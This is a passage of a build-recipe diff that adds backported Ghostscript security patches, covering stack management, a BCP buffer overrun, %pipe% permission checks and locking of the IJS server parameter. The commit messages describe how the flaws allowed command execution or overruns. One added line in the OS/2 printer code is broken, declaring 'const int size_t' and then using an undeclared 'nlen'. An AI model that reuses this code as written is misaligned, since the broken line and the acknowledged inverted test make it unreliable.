28 base/gp_os2pr.c | 13 +++++++++-
29 base/gslibctx.c | 69 ++++++++++---------------------------------------
30 5 files changed, 65 insertions(+), 60 deletions(-)
31
32diff --git a/base/gdevpipe.c b/base/gdevpipe.c
33index 96d71f5d8..5bdc485be 100644
34--- a/base/gdevpipe.c
35+++ b/base/gdevpipe.c
36@@ -72,8 +72,28 @@ pipe_fopen(gx_io_device * iodev, const char *fname, const char *access,
37 #else
38 gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
39 gs_fs_list_t *fs = ctx->core->fs;
40+ /* The pipe device can be reached in two ways, explicltly with %pipe%
41+ or implicitly with "|", so we have to check for both
42+ */
43+ char f[gp_file_name_sizeof];
44+ const char *pipestr = "|";
45+ const size_t pipestrlen = strlen(pipestr);
46+ const size_t preflen = strlen(iodev->dname);
47+ const size_t nlen = strlen(fname);
48+ int code1;
49+
50+ if (preflen + nlen >= gp_file_name_sizeof)
51+ return_error(gs_error_invalidaccess);
52+
53+ memcpy(f, iodev->dname, preflen);
54+ memcpy(f + preflen, fname, nlen + 1);
55+
56+ code1 = gp_validate_path(mem, f, access);
57+
58+ memcpy(f, pipestr, pipestrlen);
59+ memcpy(f + pipestrlen, fname, nlen + 1);
60
61- if (gp_validate_path(mem, fname, access) != 0)
62+ if (code1 != 0 && gp_validate_path(mem, f, access) != 0 )
63 return gs_error_invalidfileaccess;
64
65 /*
66diff --git a/base/gp_mshdl.c b/base/gp_mshdl.c
67index 2b964ed74..8d87ceadc 100644
68--- a/base/gp_mshdl.c
69+++ b/base/gp_mshdl.c
70@@ -95,8 +95,17 @@ mswin_handle_fopen(gx_io_device * iodev, const char *fname, const char *access,
71 long hfile; /* Correct for Win32, may be wrong for Win64 */
72 gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
73 gs_fs_list_t *fs = ctx->core->fs;
74+ char f[gp_file_name_sizeof];
75+ const size_t preflen = strlen(iodev->dname);
76+ const size_t nlen = strlen(fname);
77
78- if (gp_validate_path(mem, fname, access) != 0)
79+ if (preflen + nlen >= gp_file_name_sizeof)
80+ return_error(gs_error_invalidaccess);
81+
82+ memcpy(f, iodev->dname, preflen);
83+ memcpy(f + preflen, fname, nlen + 1);
84+
85+ if (gp_validate_path(mem, f, access) != 0)
86 return gs_error_invalidfileaccess;
87
88 /* First we try the open_handle method. */
89diff --git a/base/gp_msprn.c b/base/gp_msprn.c
90index ed4827968..746a974f7 100644
91--- a/base/gp_msprn.c
92+++ b/base/gp_msprn.c
93@@ -168,8 +168,16 @@ mswin_printer_fopen(gx_io_device * iodev, const char *fname, const char *access,
94 unsigned long *ptid = &((tid_t *)(iodev->state))->tid;
95 gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
96 gs_fs_list_t *fs = ctx->core->fs;
97+ const size_t preflen = strlen(iodev->dname);
98+ const size_t nlen = strlen(fname);
99
100- if (gp_validate_path(mem, fname, access) != 0)
101+ if (preflen + nlen >= gp_file_name_sizeof)
102+ return_error(gs_error_invalidaccess);
103+
104+ memcpy(pname, iodev->dname, preflen);
105+ memcpy(pname + preflen, fname, nlen + 1);
106+
107+ if (gp_validate_path(mem, pname, access) != 0)
108 return gs_error_invalidfileaccess;
109
110 /* First we try the open_printer method. */
111diff --git a/base/gp_os2pr.c b/base/gp_os2pr.c
112index f852c71fc..ba54cde66 100644
113--- a/base/gp_os2pr.c
114+++ b/base/gp_os2pr.c
115@@ -107,9 +107,20 @@ os2_printer_fopen(gx_io_device * iodev, const char *fname, const char *access,
116 FILE ** pfile, char *rfname, uint rnamelen)
117 {
118 os2_printer_t *pr = (os2_printer_t *)iodev->state;
119- char driver_name[256];
120+ char driver_name[gp_file_name_sizeof];
121 gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
122 gs_fs_list_t *fs = ctx->core->fs;
123+ const size_t preflen = strlen(iodev->dname);
124+ const int size_t = strlen(fname);
125+
126+ if (preflen + nlen >= gp_file_name_sizeof)
127+ return_error(gs_error_invalidaccess);
128+
129+ memcpy(driver_name, iodev->dname, preflen);
130+ memcpy(driver_name + preflen, fname, nlen + 1);
131+
132+ if (gp_validate_path(mem, driver_name, access) != 0)
133+ return gs_error_invalidfileaccess;
134
135 /* First we try the open_printer method. */
136 /* Note that the loop condition here ensures we don't
137diff --git a/base/gslibctx.c b/base/gslibctx.c
138index 6dfed6cd5..318039fad 100644
139--- a/base/gslibctx.c
140+++ b/base/gslibctx.c
141@@ -655,82 +655,39 @@ rewrite_percent_specifiers(char *s)
142 int
143 gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
144 {
145- char *fp, f[gp_file_name_sizeof];
146- const int pipe = 124; /* ASCII code for '|' */
147- const int len = strlen(fname);
148- int i, code;
149+ char f[gp_file_name_sizeof];
150+ int code;
151
152 /* Be sure the string copy will fit */
153- if (len >= gp_file_name_sizeof)
154+ if (strlen(fname) >= gp_file_name_sizeof)
155 return gs_error_rangecheck;
156 strcpy(f, fname);
157- fp = f;
158 /* Try to rewrite any %d (or similar) in the string */
159 rewrite_percent_specifiers(f);
160- for (i = 0; i < len; i++) {
161- if (f[i] == pipe) {
162- fp = &f[i + 1];
163- /* Because we potentially have to check file permissions at two levels
164- for the output file (gx_device_open_output_file and the low level
165- fopen API, if we're using a pipe, we have to add both the full string,
166- (including the '|', and just the command to which we pipe - since at
167- the pipe_fopen(), the leading '|' has been stripped.
168- */
169- code = gs_add_control_path(mem, gs_permit_file_writing, f);
170- if (code < 0)
171- return code;
172- code = gs_add_control_path(mem, gs_permit_file_control, f);
173- if (code < 0)
174- return code;
175- break;
176- }
177- if (!IS_WHITESPACE(f[i]))
178- break;
179- }
180- code = gs_add_control_path(mem, gs_permit_file_control, fp);
181+
182+ code = gs_add_control_path(mem, gs_permit_file_control, f);
183 if (code < 0)
184 return code;
185- return gs_add_control_path(mem, gs_permit_file_writing, fp);
186+ return gs_add_control_path(mem, gs_permit_file_writing, f);
187 }
188
189 int
190 gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
191 {
192- char *fp, f[gp_file_name_sizeof];
193- const int pipe = 124; /* ASCII code for '|' */
194- const int len = strlen(fname);
195- int i, code;
196+ char f[gp_file_name_sizeof];
197+ int code;
198
199 /* Be sure the string copy will fit */
200- if (len >= gp_file_name_sizeof)
201+ if (strlen(fname) >= gp_file_name_sizeof)
202 return gs_error_rangecheck;
203 strcpy(f, fname);
204- fp = f;
205 /* Try to rewrite any %d (or similar) in the string */
206- for (i = 0; i < len; i++) {
207- if (f[i] == pipe) {
208- fp = &f[i + 1];
209- /* Because we potentially have to check file permissions at two levels
210- for the output file (gx_device_open_output_file and the low level
211- fopen API, if we're using a pipe, we have to add both the full string,
212- (including the '|', and just the command to which we pipe - since at
213- the pipe_fopen(), the leading '|' has been stripped.
214- */
215- code = gs_remove_control_path(mem, gs_permit_file_writing, f);
216- if (code < 0)
217- return code;
218- code = gs_remove_control_path(mem, gs_permit_file_control, f);
219- if (code < 0)
220- return code;
221- break;
222- }
223- if (!IS_WHITESPACE(f[i]))
224- break;
225- }
226- code = gs_remove_control_path(mem, gs_permit_file_control, fp);
227+ rewrite_percent_specifiers(f);
228+
229+ code = gs_remove_control_path(mem, gs_permit_file_control, f);
230 if (code < 0)
231 return code;
232- return gs_remove_control_path(mem, gs_permit_file_writing, fp);
233+ return gs_remove_control_path(mem, gs_permit_file_writing, f);
234 }
235
236 int
237--
2382.25.1
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch
new file mode 100644
index 0000000000..f312f89e04
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch
@@ -0,0 +1,65 @@
1From 6643ff0cb837db3eade489ffff21e3e92eee2ae0 Mon Sep 17 00:00:00 2001
2From: Chris Liddell <chris.liddell@artifex.com>
3Date: Fri, 28 Jan 2022 08:21:19 +0000
4Subject: [PATCH] [PATCH] Bug 703902: Fix op stack management in
5 sampled_data_continue()
6
7Replace pop() (which does no checking, and doesn't handle stack extension
8blocks) with ref_stack_pop() which does do all that.
9
10We still use pop() in one case (it's faster), but we have to later use
11ref_stack_pop() before calling sampled_data_sample() which also accesses the
12op stack.
13
14Fixes:
15https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=34675
16
17Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=2a3129365d3bc0d4a41f107ef175920d1505d1f7]
18CVE: CVE-2021-45949
19Signed-off-by: Minjae Kim <flowergom@gmail.com>
20---
21 psi/zfsample.c | 13 ++++++++-----
22 1 file changed, 8 insertions(+), 5 deletions(-)
23
24diff --git a/psi/zfsample.c b/psi/zfsample.c
25index 0023fa4..f84671f 100644
26--- a/psi/zfsample.c
27+++ b/psi/zfsample.c
28@@ -534,14 +534,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
29 data_ptr[bps * i + j] = (byte)(cv >> ((bps - 1 - j) * 8)); /* MSB first */
30 }
31 pop(num_out); /* Move op to base of result values */
32-
33+ /* From here on, we have to use ref_stack_pop() rather than pop()
34+ so that it handles stack extension blocks properly, before calling
35+ sampled_data_sample() which also uses the op stack.
36+ */
37 /* Check if we are done collecting data. */
38
39 if (increment_cube_indexes(params, penum->indexes)) {
40 if (stack_depth_adjust == 0)
41- pop(O_STACK_PAD); /* Remove spare stack space */
42+ ref_stack_pop(&o_stack, O_STACK_PAD); /* Remove spare stack space */
43 else
44- pop(stack_depth_adjust - num_out);
45+ ref_stack_pop(&o_stack, stack_depth_adjust - num_out);
46 /* Execute the closing procedure, if given */
47 code = 0;
48 if (esp_finish_proc != 0)
49@@ -554,11 +557,11 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
50 if ((O_STACK_PAD - stack_depth_adjust) < 0) {
51 stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust);
52 check_op(stack_depth_adjust);
53- pop(stack_depth_adjust);
54+ ref_stack_pop(&o_stack, stack_depth_adjust);
55 }
56 else {
57 check_ostack(O_STACK_PAD - stack_depth_adjust);
58- push(O_STACK_PAD - stack_depth_adjust);
59+ ref_stack_push(&o_stack, O_STACK_PAD - stack_depth_adjust);
60 for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
61 make_null(op - i);
62 }
63--
642.17.1
65
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch
new file mode 100644
index 0000000000..852f2459f7
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch
@@ -0,0 +1,54 @@
1From 37ed5022cecd584de868933b5b60da2e995b3179 Mon Sep 17 00:00:00 2001
2From: Ken Sharp <ken.sharp@artifex.com>
3Date: Fri, 24 Mar 2023 13:19:57 +0000
4Subject: [PATCH] Graphics library - prevent buffer overrun in (T)BCP encoding
5
6Bug #706494 "Buffer Overflow in s_xBCPE_process"
7
8As described in detail in the bug report, if the write buffer is filled
9to one byte less than full, and we then try to write an escaped
10character, we overrun the buffer because we don't check before
11writing two bytes to it.
12
13This just checks if we have two bytes before starting to write an
14escaped character and exits if we don't (replacing the consumed byte
15of the input).
16
17Up for further discussion; why do we even permit a BCP encoding filter
18anyway ? I think we should remove this, at least when SAFER is true.
19
20Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;h=37ed5022cecd584de868933b5b60da2e995b3179]
21CVE: CVE-2023-28879
22Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
23---
24 base/sbcp.c | 10 +++++++++-
25 1 file changed, 9 insertions(+), 1 deletion(-)
26
27diff --git a/base/sbcp.c b/base/sbcp.c
28index 6b0383c..90784b5 100644
29--- a/base/sbcp.c
30+++ b/base/sbcp.c
31@@ -1,4 +1,4 @@
32-/* Copyright (C) 2001-2019 Artifex Software, Inc.
33+/* Copyright (C) 2001-2023 Artifex Software, Inc.
34 All Rights Reserved.
35
36 This software is provided AS-IS with no warranty, either express or
37@@ -50,6 +50,14 @@ s_xBCPE_process(stream_state * st, stream_cursor_read * pr,
38 byte ch = *++p;
39
40 if (ch <= 31 && escaped[ch]) {
41+ /* Make sure we have space to store two characters in the write buffer,
42+ * if we don't then exit without consuming the input character, we'll process
43+ * that on the next time round.
44+ */
45+ if (pw->limit - q < 2) {
46+ p--;
47+ break;
48+ }
49 if (p == rlimit) {
50 p--;
51 break;
52--
532.25.1
54
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch
new file mode 100644
index 0000000000..a3bbe958eb
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch
@@ -0,0 +1,145 @@
1From 5e65eeae225c7d02d447de5abaf4a8e6d234fcea Mon Sep 17 00:00:00 2001
2From: Chris Liddell <chris.liddell@artifex.com>
3Date: Wed, 7 Jun 2023 10:23:06 +0100
4Subject: [PATCH] Bug 706761: Don't "reduce" %pipe% file names for permission validation
5
6For regular file names, we try to simplfy relative paths before we use them.
7
8Because the %pipe% device can, effectively, accept command line calls, we
9shouldn't be simplifying that string, because the command line syntax can end
10up confusing the path simplifying code. That can result in permitting a pipe
11command which does not match what was originally permitted.
12
13Special case "%pipe" in the validation code so we always deal with the entire
14string.
15
16Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=505eab7782b429017eb434b2b95120855f2b0e3c]
17CVE: CVE-2023-36664
18Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
19---
20 base/gpmisc.c | 31 +++++++++++++++++++--------
21 base/gslibctx.c | 56 ++++++++++++++++++++++++++++++++++++-------------
22 2 files changed, 64 insertions(+), 23 deletions(-)
23
24diff --git a/base/gpmisc.c b/base/gpmisc.c
25index c4fffae..09ac6b3 100644
26--- a/base/gpmisc.c
27+++ b/base/gpmisc.c
28@@ -1046,16 +1046,29 @@ gp_validate_path_len(const gs_memory_t *mem,
29 && !memcmp(path + cdirstrl, dirsepstr, dirsepstrl)) {
30 prefix_len = 0;
31 }
32- rlen = len+1;
33- bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
34- if (bufferfull == NULL)
35- return gs_error_VMerror;
36-
37- buffer = bufferfull + prefix_len;
38- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
39- return gs_error_invalidfileaccess;
40- buffer[rlen] = 0;
41
42+ /* "%pipe%" do not follow the normal rules for path definitions, so we
43+ don't "reduce" them to avoid unexpected results
44+ */
45+ if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
46+ bufferfull = buffer = (char *)gs_alloc_bytes(mem->thread_safe_memory, len + 1, "gp_validate_path");
47+ if (buffer == NULL)
48+ return gs_error_VMerror;
49+ memcpy(buffer, path, len);
50+ buffer[len] = 0;
51+ rlen = len;
52+ }
53+ else {
54+ rlen = len+1;
55+ bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
56+ if (bufferfull == NULL)
57+ return gs_error_VMerror;
58+
59+ buffer = bufferfull + prefix_len;
60+ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
61+ return gs_error_invalidfileaccess;
62+ buffer[rlen] = 0;
63+ }
64 while (1) {
65 switch (mode[0])
66 {
67diff --git a/base/gslibctx.c b/base/gslibctx.c
68index 20c5eee..355c0e3 100644
69--- a/base/gslibctx.c
70+++ b/base/gslibctx.c
71@@ -719,14 +719,28 @@ gs_add_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const ch
72 return gs_error_rangecheck;
73 }
74
75- rlen = len+1;
76- buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gp_validate_path");
77- if (buffer == NULL)
78- return gs_error_VMerror;
79+ /* "%pipe%" do not follow the normal rules for path definitions, so we
80+ don't "reduce" them to avoid unexpected results
81+ */
82+ if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
83+ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_add_control_path_len");
84+ if (buffer == NULL)
85+ return gs_error_VMerror;
86+ memcpy(buffer, path, len);
87+ buffer[len] = 0;
88+ rlen = len;
89+ }
90+ else {
91+ rlen = len + 1;
92
93- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
94- return gs_error_invalidfileaccess;
95- buffer[rlen] = 0;
96+ buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gs_add_control_path_len");
97+ if (buffer == NULL)
98+ return gs_error_VMerror;
99+
100+ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
101+ return gs_error_invalidfileaccess;
102+ buffer[rlen] = 0;
103+ }
104
105 n = control->num;
106 for (i = 0; i < n; i++)
107@@ -802,14 +816,28 @@ gs_remove_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const
108 return gs_error_rangecheck;
109 }
110
111- rlen = len+1;
112- buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gp_validate_path");
113- if (buffer == NULL)
114- return gs_error_VMerror;
115+ /* "%pipe%" do not follow the normal rules for path definitions, so we
116+ don't "reduce" them to avoid unexpected results
117+ */
118+ if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
119+ buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_remove_control_path_len");
120+ if (buffer == NULL)
121+ return gs_error_VMerror;
122+ memcpy(buffer, path, len);
123+ buffer[len] = 0;
124+ rlen = len;
125+ }
126+ else {
127+ rlen = len+1;
128
129- if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
130- return gs_error_invalidfileaccess;
131- buffer[rlen] = 0;
132+ buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gs_remove_control_path_len");
133+ if (buffer == NULL)
134+ return gs_error_VMerror;
135+
136+ if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success)
137+ return gs_error_invalidfileaccess;
138+ buffer[rlen] = 0;
139+ }
140
141 n = control->num;
142 for (i = 0; i < n; i++) {
143--
1442.25.1
145
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch
new file mode 100644
index 0000000000..e8c42f1deb
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch
@@ -0,0 +1,60 @@
1From fb342fdb60391073a69147cb71af1ac416a81099 Mon Sep 17 00:00:00 2001
2From: Chris Liddell <chris.liddell@artifex.com>
3Date: Wed, 14 Jun 2023 09:08:12 +0100
4Subject: [PATCH] Bug 706778: 706761 revisit
5
6Two problems with the original commit. The first a silly typo inverting the
7logic of a test.
8
9The second was forgetting that we actually actually validate two candidate
10strings for pipe devices. One with the expected "%pipe%" prefix, the other
11using the pipe character prefix: "|".
12
13This addresses both those.
14
15Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=fb342fdb60391073a69147cb71af1ac416a81099]
16CVE: CVE-2023-36664
17Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
18---
19 base/gpmisc.c | 2 +-
20 base/gslibctx.c | 4 ++--
21 2 files changed, 3 insertions(+), 3 deletions(-)
22
23diff --git a/base/gpmisc.c b/base/gpmisc.c
24index 09ac6b3..01d449f 100644
25--- a/base/gpmisc.c
26+++ b/base/gpmisc.c
27@@ -1050,7 +1050,7 @@ gp_validate_path_len(const gs_memory_t *mem,
28 /* "%pipe%" do not follow the normal rules for path definitions, so we
29 don't "reduce" them to avoid unexpected results
30 */
31- if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
32+ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
33 bufferfull = buffer = (char *)gs_alloc_bytes(mem->thread_safe_memory, len + 1, "gp_validate_path");
34 if (buffer == NULL)
35 return gs_error_VMerror;
36diff --git a/base/gslibctx.c b/base/gslibctx.c
37index 355c0e3..d8f74a3 100644
38--- a/base/gslibctx.c
39+++ b/base/gslibctx.c
40@@ -722,7 +722,7 @@ gs_add_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const ch
41 /* "%pipe%" do not follow the normal rules for path definitions, so we
42 don't "reduce" them to avoid unexpected results
43 */
44- if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
45+ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
46 buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_add_control_path_len");
47 if (buffer == NULL)
48 return gs_error_VMerror;
49@@ -819,7 +819,7 @@ gs_remove_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const
50 /* "%pipe%" do not follow the normal rules for path definitions, so we
51 don't "reduce" them to avoid unexpected results
52 */
53- if (len > 5 && memcmp(path, "%pipe", 5) != 0) {
54+ if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) {
55 buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_remove_control_path_len");
56 if (buffer == NULL)
57 return gs_error_VMerror;
58--
592.25.1
60
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch
new file mode 100644
index 0000000000..662736bb3d
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch
@@ -0,0 +1,62 @@
1From 4ceaf92815302863a8c86fcfcf2347e0118dd3a5 Mon Sep 17 00:00:00 2001
2From: Ray Johnston <ray.johnston@artifex.com>
3Date: Tue, 22 Sep 2020 13:10:04 -0700
4Subject: [PATCH] Fix gp_file allocations to use thread_safe_memory.
5
6The gpmisc.c does allocations for gp_file objects and buffers used by
7gp_fprintf, as well as gp_validate_path_len. The helgrind run with
8-dBGPrint -dNumRenderingThreads=4 and PCL input showed up the gp_fprintf
9problem since the clist rendering would call gp_fprintf using the same
10allocator (PCL's chunk allocator which is non_gc_memory). The chunk
11allocator is intentionally not thread safe (for performance).
12
13Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4ceaf92815302863a8c86fcfcf2347e0118dd3a5]
14CVE: CVE-2023-36664 #Dependency Patch1
15Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
16---
17 base/gpmisc.c | 8 ++++----
18 1 file changed, 4 insertions(+), 4 deletions(-)
19
20diff --git a/base/gpmisc.c b/base/gpmisc.c
21index 34cd71f..c4fffae 100644
22--- a/base/gpmisc.c
23+++ b/base/gpmisc.c
24@@ -435,7 +435,7 @@ generic_pwrite(gp_file *f, size_t count, gs_offset_t offset, const void *buf)
25
26 gp_file *gp_file_alloc(gs_memory_t *mem, const gp_file_ops_t *prototype, size_t size, const char *cname)
27 {
28- gp_file *file = (gp_file *)gs_alloc_bytes(mem->non_gc_memory, size, cname ? cname : "gp_file");
29+ gp_file *file = (gp_file *)gs_alloc_bytes(mem->thread_safe_memory, size, cname ? cname : "gp_file");
30 if (file == NULL)
31 return NULL;
32
33@@ -449,7 +449,7 @@ gp_file *gp_file_alloc(gs_memory_t *mem, const gp_file_ops_t *prototype, size_t
34 memset(((char *)file)+sizeof(*prototype),
35 0,
36 size - sizeof(*prototype));
37- file->memory = mem->non_gc_memory;
38+ file->memory = mem->thread_safe_memory;
39
40 return file;
41 }
42@@ -1047,7 +1047,7 @@ gp_validate_path_len(const gs_memory_t *mem,
43 prefix_len = 0;
44 }
45 rlen = len+1;
46- bufferfull = (char *)gs_alloc_bytes(mem->non_gc_memory, rlen + prefix_len, "gp_validate_path");
47+ bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path");
48 if (bufferfull == NULL)
49 return gs_error_VMerror;
50
51@@ -1093,7 +1093,7 @@ gp_validate_path_len(const gs_memory_t *mem,
52 break;
53 }
54
55- gs_free_object(mem->non_gc_memory, bufferfull, "gp_validate_path");
56+ gs_free_object(mem->thread_safe_memory, bufferfull, "gp_validate_path");
57 #ifdef EACCES
58 if (code == gs_error_invalidfileaccess)
59 errno = EACCES;
60--
612.25.1
62
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch
new file mode 100644
index 0000000000..3acb8a503c
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch
@@ -0,0 +1,62 @@
1From 8b0f20002536867bd73ff4552408a72597190cbe Mon Sep 17 00:00:00 2001
2From: Ken Sharp <ken.sharp@artifex.com>
3Date: Thu, 24 Aug 2023 15:24:35 +0100
4Subject: [PATCH] IJS device - try and secure the IJS server startup
5
6Bug #707051 ""ijs" device can execute arbitrary commands"
7
8The problem is that the 'IJS' device needs to start the IJS server, and
9that is indeed an arbitrary command line. There is (apparently) no way
10to validate it. Indeed, this is covered quite clearly in the comments
11at the start of the source:
12
13 * WARNING: The ijs server can be selected on the gs command line
14 * which is a security risk, since any program can be run.
15
16Previously this used the awful LockSafetyParams hackery, which we
17abandoned some time ago because it simply couldn't be made secure (it
18was implemented in PostScript and was therefore vulnerable to PostScript
19programs).
20
21This commit prevents PostScript programs switching to the IJS device
22after SAFER has been activated, and prevents changes to the IjsServer
23parameter after SAFER has been activated.
24
25SAFER is activated, unless explicitly disabled, before any user
26PostScript is executed which means that the device and the server
27invocation can only be configured on the command line. This does at
28least provide minimal security against malicious PostScript programs.
29
30Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=e59216049cac290fb437a04c4f41ea46826cfba5]
31CVE: CVE-2023-43115
32Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
33---
34 devices/gdevijs.c | 5 ++++-
35 1 file changed, 4 insertions(+), 1 deletion(-)
36
37diff --git a/devices/gdevijs.c b/devices/gdevijs.c
38index 3d337c5..e50d69f 100644
39--- a/devices/gdevijs.c
40+++ b/devices/gdevijs.c
41@@ -934,6 +934,9 @@ gsijs_finish_copydevice(gx_device *dev, const gx_device *from_dev)
42 static const char rgb[] = "DeviceRGB";
43 gx_device_ijs *ijsdev = (gx_device_ijs *)dev;
44
45+ if (ijsdev->memory->gs_lib_ctx->core->path_control_active)
46+ return_error(gs_error_invalidaccess);
47+
48 code = gx_default_finish_copydevice(dev, from_dev);
49 if(code < 0)
50 return code;
51@@ -1363,7 +1366,7 @@ gsijs_put_params(gx_device *dev, gs_param_list *plist)
52 if (code >= 0)
53 code = gsijs_read_string(plist, "IjsServer",
54 ijsdev->IjsServer, sizeof(ijsdev->IjsServer),
55- dev->LockSafetyParams, is_open);
56+ ijsdev->memory->gs_lib_ctx->core->path_control_active, is_open);
57
58 if (code >= 0)
59 code = gsijs_read_string_malloc(plist, "DeviceManufacturer",
60--
612.25.1
62
diff --git a/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch
new file mode 100644
index 0000000000..77eec7d158
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch
@@ -0,0 +1,51 @@
1From 7861fcad13c497728189feafb41cd57b5b50ea25 Mon Sep 17 00:00:00 2001
2From: Chris Liddell <chris.liddell@artifex.com>
3Date: Fri, 12 Feb 2021 10:34:23 +0000
4Subject: [PATCH] oss-fuzz 30715: Check stack limits after function evaluation.
5
6During function result sampling, after the callout to the Postscript
7interpreter, make sure there is enough stack space available before pushing
8or popping entries.
9
10In thise case, the Postscript procedure for the "function" is totally invalid
11(as a function), and leaves the op stack in an unrecoverable state (as far as
12function evaluation is concerned). We end up popping more entries off the
13stack than are available.
14
15To cope, add in stack limit checking to throw an appropriate error when this
16happens.
17CVE: CVE-2021-45944
18Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=patch;h=7861fcad13c497728189feafb41cd57b5b50ea25]
19Signed-off-by: Minjae Kim <flowergom@gmail.com>
20---
21 psi/zfsample.c | 14 +++++++++++---
22 1 file changed, 11 insertions(+), 3 deletions(-)
23
24diff --git a/psi/zfsample.c b/psi/zfsample.c
25index 290809405..652ae02c6 100644
26--- a/psi/zfsample.c
27+++ b/psi/zfsample.c
28@@ -551,9 +551,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
29 } else {
30 if (stack_depth_adjust) {
31 stack_depth_adjust -= num_out;
32- push(O_STACK_PAD - stack_depth_adjust);
33- for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
34- make_null(op - i);
35+ if ((O_STACK_PAD - stack_depth_adjust) < 0) {
36+ stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust);
37+ check_op(stack_depth_adjust);
38+ pop(stack_depth_adjust);
39+ }
40+ else {
41+ check_ostack(O_STACK_PAD - stack_depth_adjust);
42+ push(O_STACK_PAD - stack_depth_adjust);
43+ for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
44+ make_null(op - i);
45+ }
46 }
47 }
48
49--
502.25.1
51
diff --git a/meta/recipes-extended/ghostscript/ghostscript_9.52.bb b/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
index 65135f5821..e57f592892 100644
--- a/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
+++ b/meta/recipes-extended/ghostscript/ghostscript_9.52.bb
@@ -19,6 +19,10 @@ DEPENDS_class-native = "libpng-native"
19UPSTREAM_CHECK_URI = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases" 19UPSTREAM_CHECK_URI = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases"
